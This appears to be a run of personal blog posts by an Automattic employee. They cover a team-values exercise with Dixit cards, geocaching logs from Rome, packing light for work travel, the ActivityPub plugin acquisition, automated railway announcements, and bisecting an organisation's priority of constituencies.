In front of the Colosseum in Rome, Dan - wearing a rainbow-striped bandana atop which his sunglasses are perched - takes a selfie. Behind him stand a man with dark hair and a closely-trimmed beard wearing a purple "woo" t-shirt, a woman with long brown hair wearing beads and a multicoloured dress, a man wearing spectacles and a dark t-shirt on which the number "23" can be made out, and a man in sunglasses with a ginger beard, wearing an open blue shirt.
We were missing two members of our team, but one was able to remote-in (the other’s on parental leave!).

Fellow Automattician Ben Dwyer recently wrote about his experience of using a deck of Dixit cards to help his team refine their values in a fun and engaging way. I own a Dixit set, so we decided to give it a go too.

A deck of Dixit cards, bound by a twisted elastic band, sits on a flight itinerary for the journey "LGW to FCO" taking place on May 21, 2023 and costing $367.60.
The cards sat on my ‘plane tickets for a fortnight because it was just about the only way I’d remember to pack them.

Normally when you play Dixit, you select a card from your hand – each shows a unique piece of artwork – and try to describe it in a way that’s precise enough that some of the other players will later be able to pick it out of a line-up, but ambiguous enough that not all the other players will. It’s a delicate balancing act. Even when our old Geek Night was in full swing we didn’t use to play it often because our well-established group’s cornucopia of in-jokes and references made it trivially easy to “target” your descriptions at specific players1, but it’s still a solid icebreaker activity.

A trio of Dixit cards within a grid of nine. From left to right, they show: a heart, on fire, beneath a glass jar; a cubbyhole containing childrens' toys; a fairy leaping from a book towards a small person atop a stack of books.
Can you see your team’s values symbolised in any Dixit cards?

Perhaps it was the fantasy artwork that inspired us or maybe it just says something about how my team sees themselves, but what we came up with had a certain… swords-and-sorcery… even Dungeons & Dragons… feel to it.

Partial screenshot from a document entitled "Team Fire". The visible part is titled "Who we are (identity)" and reads: We are a band of brave adventurers who bring light into the wild forests of Extend. We tame the monsters who lurk in the dungeons beneath the Castle of Vendor Experience. The beasts we keep at bay include: PBS, which helps ensure code quality and extension standards compliance; the Vendor Dashboard, haunt of third-party developers, as well as their documentation and analytics platforms; Integrations with Payments Admin, to ensure that treasure is shared, and other tools.
The projects my team are responsible for aren’t actually monsters, but they can be complex, multifaceted, and unintuitive. And have a high AC.

Our team’s new identity isn’t finalised, but I love the fact that we’ve been able to inject a bit of fun and whimsy into it. At our last draft, my team looks to be defined as comprising:

  • Gareth, Level 62 Pathfinder, leading the way through the wilds
  • Bero, Level 5 Battlesmith, currently lost in the void
  • Dan (me!), Level 5 Arcane Trickster, breaking locks and stealing treasure
  • Cem, Level 4 Dragonslayer, smashing doors and bugs alike
  • Lae, Level 7 Pirate, seabound rogue with eyes on the horizon
  • Kyle, Level 5 Apprentice Bard, master of words and magic
  • Simran, Level 6 Apprentice Code Witch, weaving spells from nature

I think that’s pretty awesome.

Footnotes

1 Also: I don’t own any of the expansion packs and playing with the same cards over and over again gets a bit samey.

2 The “levels” are simply the number of years each teammate has been an Automattician, plus one.

Dan Q found GC7FB9H From Canterbury to the cache

This checkin to GC7FB9H From Canterbury to the cache reflects a geocaching.com log entry. See more of Dan's cache logs.

Well that was quite the adventure!

The first waypoint is right across the road from where some work colleagues and I are staying for an “away week”. I decided to dash out during a break in the weather to try and solve this multi between meetings. But I was quickly confused because… this isn’t the way I was taught to do Roman numerals. I’d always been told that you should never have four of the same letter in a row, e.g. you should say XIV, not XIIII. Once I’d worked out what I was doing wrong, though, I was okay!

The second and third waypoints had me braving some frankly scary roads. The drivers here just don’t seem to stop unless you’re super assertive when you step out!

Once I had the final numbers and ran it through geochecker I realised that the cache must be very close to where I’d had lunch earlier today! Once I got there it took me a while to get to the right floor, after which the hint made things pretty obvious.

Great trail, really loved it. And just barely made it back before the rain really started hammering down. TFTC, FP awarded, and greetings from Oxford, UK!

Dan holding an orange mint tin in a city centre.

Dan Q found GC9QCKH When in Rome live as the Romans do (bb Tribute 05)

This checkin to GC9QCKH When in Rome live as the Romans do (bb Tribute 05) reflects a geocaching.com log entry. See more of Dan's cache logs.

Took until the fourth hiding place before I found the cache. Out for a walk with work colleagues on the way to dinner. Greetings from Oxfordshire, UK!

Alongside the River Tiber, with a wide-arched stone bridge in the background, Dan sits on a wall and waves to the camera.

Travelling light

Now that travel for work is back on the menu, I’ve been trying to upgrade my “pack light” game.

I’ve been inspired in part by Beau, who I first met during my trip to South Africa in 2019 during my Automattic onboarding. Beau travelled from the US for a two week jaunt with nothing but hand luggage, and it blew my mind.

A modest-sized backpack in blue and yellow, with a WordPress logo stitched on, sits on an airport departure lounge bench. Alongside it is a burgundy-coloured British passport.
Gotta flight? Pack light, pack tight. That’s right! Corporate branding is just a bonus.

For my trip to Vienna earlier this year for a divisional meetup, I got by with just a backpack and a laptop bag. Right now, I’m waiting to fly to Rome for a week, and I’ve ditched the laptop bag in favour of just a single carry-on backpack. About 7kg of luggage, and well within the overhead locker size limit.

I’m absolutely sold on this approach. I get to:

  • walk past the queues for luggage drop (having checked-in online),
  • keep the entirety of my luggage with me at all times (which ensures it goes where I do),
  • breeze through security1, thanks to smart packing2,
  • walk right out of the airport at the other end without having to wait for the flingers to finish smashing everybody’s luggage into the carousels.
Minimalist carbon fibre wallet, balanced on two fingertips, with parts of a Halifax Mastercard credit card showing from behind an elasticated band.
I’ve been working on simplifying my everyday carry, too. My wallet is the Carbon Fibre Liquid Wallet, which is about the size of a deck of playing cards (something I also often carry!) and holds a handful of cards, a bundle of cash, a bottle opener, and all my regular keys. The hook on the end is for attaching the pendrive with my password safe for travel.

As somebody who’s travelled “heavy” for most of my life – and especially since the children came along – it’s liberating to migrate to a “pick up a bag and go” mindset. To begin with, the nagging thought that I must’ve forgotten something essential was challenging, but I think I’ve gotten past that stage now.

Travelling light feels carefree: like being a kid again, when all you needed was the bag on your back and you were ready for an adventure. Once again, I’ve got a bag on my back3 and I know that everything I need for an adventure is right here with me4.

Footnotes

1 If you’ve travelled with me before, you might have noticed that I sometimes have trouble at borders on account of my damn stupid name, as predicted by the Passport Office. I’ve since learned all the requisite tricks to sidestep these problems, but that’s probably worthy of a post in its own right.

2 A little smart packing goes a long way. In the photo above, you might see my pre-prepared liquids bag in a side pocket, my laptop slides right out for separate scanning, my wallet and phone just dump out of my pockets, and I’m done.

3 I don’t really have a bag on my back right now. I’m sat in a departure lounge at Gatwick Airport. But you get the idea.

4 Do I really have everything I need? I’ve not brought a waterproof coat and, looking at the weather forecast at my destination, this might have been a mistake. But worst case I can buy a cheap poncho at the other end. That’s the kind of freedom that being an adult gets you, replacing the childlike freedom to get soaked and not care.

Automattic Acquires ActivityPub Plugin for WordPress

This article is a repost promoting content originally published elsewhere. See more things Dan's reposted.

Automattic has acquired the ActivityPub plugin for WordPress from German developer Matthias Pfefferle, who will be joining the company to continue improving support for federated platforms. Pfefferle, who is also the author of the Webmention plugin, said his new role is to see how Automattic’s products can benefit from open protocols like ActivityPub.

This is so exciting I might burst. Want to know why?

  1. Matt Mullenweg’s commitment to ActivityPub makes me happy. WordPress made Pingback and Trackback take off, back in the day, and I believe that – in the same way – Automattic can help make ActivityPub more accessible and mainstream too.
  2. Matthias Pfefferle is both an IndieWeb and an ActivityPub star; I use (and I’ve extended upon) a lot of code he’s written every day and I sponsor him on GitHub! The chance that we get to work directly together is pretty slim, but it’s a chance, right?

Susan A. Kitchens expressed concern that this could increase the level of ActivityPub spam out there (which right now is very low). I worry about that too. But I’m still optimistic that we can make something awesome off the back of this acquisition and keep the interpersonal Web federated, the way it ought to be.

Announcers and Automation

Nowadays if you’re on a railway station and hear an announcement, it’s usually a computer stitching together samples1. But back in the day, there used to be a human with a Tannoy microphone sitting in the back office, telling you about the platform alterations and destinations.

I had a friend who did it as a summer job, once. For years afterwards, he had a party trick that I always quite enjoyed: you’d say the name of a terminus station on a direct line from Preston, e.g. Edinburgh Waverley, and he’d respond in his announcer-voice: “calling at Lancaster, Oxenholme the Lake District, Penrith, Carlisle, Lockerbie, Haymarket, and Edinburgh Waverley”, listing all of the stops on that route. It was a quirky, beautiful, and unusual talent. Amazingly, when he came to re-apply for his job the next summer he didn’t get it, which I always thought was a shame because he clearly deserved it: he could do the job blindfold!

There was a strange transitional period during which we had machines to do these announcements, but they weren’t that bright. Years later I found myself on Haymarket station waiting for the next train after mine had been cancelled, when a robot voice came on to announce a platform alteration: the train to Glasgow would now be departing from platform 2, rather than platform 1. A crowd of people stood up and shuffled their way over the footbridge to the opposite side of the tracks. A minute or so later, a human announcer apologised for the inconvenience but explained that the train would be leaving from platform 1, and to disregard the previous announcement. Between then and the train’s arrival the computer tried twice more to send everybody to the wrong platform, leading to a back-and-forth argument between the machine and the human somewhat reminiscent of the white zone/red zone scene from Airplane! It was funny perhaps only because I wasn’t among the people whose train was in superposition.

Clearly even by then we’d reached the point where the machine was well-established and it was easier to openly argue with it than to dig out the manual and work out how to turn it off. Nowadays it’s probably even more so, but hopefully they’re less error-prone.

The "Mercado de Abasto" (central wholesale fruit and vegetable market) of Rosario, Argentina, 1931. Horses with carts work alongside automobiles and an omnibus.

When people talk about technological unemployment, they focus on the big changes, like how a tipping point with self-driving vehicles might one day revolutionise the haulage industry… along with the social upheaval that comes along with forcing a career change on millions of drivers.

But in the real world, automation and technological change comes in salami slices. Horses and carts were seen alongside the automobile for decades. And you still find stations with human announcers. Even the most radically-disruptive developments don’t revolutionise the world overnight. Change is inevitable, but with preparation, we can be ready for it.

Footnotes

1 Like ScotRail’s set, voiced by Alison McKay, which computers can even remix for you over a lo-fi hip-hop beat if you like.

Bisect your Priority of Constituencies

Your product, service, or organisation almost certainly has a priority of constituencies, even if it’s not written down or otherwise formally-encoded. A famous example would be that expressed in the Web Platform Design Principles. It dictates how you decide between two competing needs, all other things being equal.

At Three Rings, for example, our priority of constituencies might1 look like this:

  1. The needs of volunteers are more important than
  2. The needs of voluntary organisations, which are more important than
  3. Continuation of the Three Rings service, which is more important than
  4. Adherence to technical standards and best practice, which is more important than
  5. Development of new features

These are all things we care about, but we’re talking about where we might choose to rank them, relative to one another.

Semicircular illustration showing five facets of growing relative importance. From least to most, they are: new features, standards-compliance, service continuity, organisation needs, volunteer needs.
The priorities and constituencies portrayed in this illustration are fictitious. Any resemblance to real priorities and constituencies, whether living or dead, is entirely coincidental.

The priorities of an organisation you’re involved with won’t be the same: perhaps it includes shareholders, regulatory compliance, different kinds of end-users, employees, profits, different measures of social good, or various measurable outputs. That’s fine: every system is different.

But what I’d challenge you to do is find ways to bisect your priorities. Invent scenarios that pit each constituency against itself and discuss how they should be prioritised, all other things being equal.

Using the example above, I might ask “which is more important?” in each category:

  1. The needs of the volunteers developing Three Rings, or the needs of the volunteers who use it?
  2. The needs of organisations that currently use the system, or the needs of organisations that are considering using it?
  3. Achieving a high level of uptime, or promptly installing system updates?
  4. Compliance with standards as-written, or maximum compatibility with devices as-used?
  5. Implementation of new features that are the most popular user requests, or those which provide the biggest impact-to-effort payoff?
Illustrated priority list from above, with each item split into two and re-named such that they are, from least to most important: popular features, impact features, compliance, usability, uptime, updates, future clients, current clients, other volunteers, our volunteers.
These might not be your answers to the same questions. They’re not even necessarily mine, and they’re even less-likely to be representative of Three Rings CIC. It’s just illustrative.

The aim of the exercise isn’t to come up with a set of commandments for your company. If you come up with something you can codify, that’s great, but if you and your stakeholders just use it as an exercise in understanding the relative importance of different goals, that’s great too. Finding where people disagree is more-important than having a unifying creed2.

And of course this exercise is applicable to more than just organisational priorities. Use it for projects or standards. Use it for systems where you’re the only participant, as a thought exercise. A priority of constituencies can be a beautiful thing, but you can understand it better if you’re willing to take it apart once in a while. Bisect your priorities, and see what you find.

Footnotes

1 Three Rings doesn’t have an explicit priority of constituencies: the example I give is based on my own interpretation, but I’m only a small part of the organisation.

2 Having a creed is awesome too, though, as I’ve said before.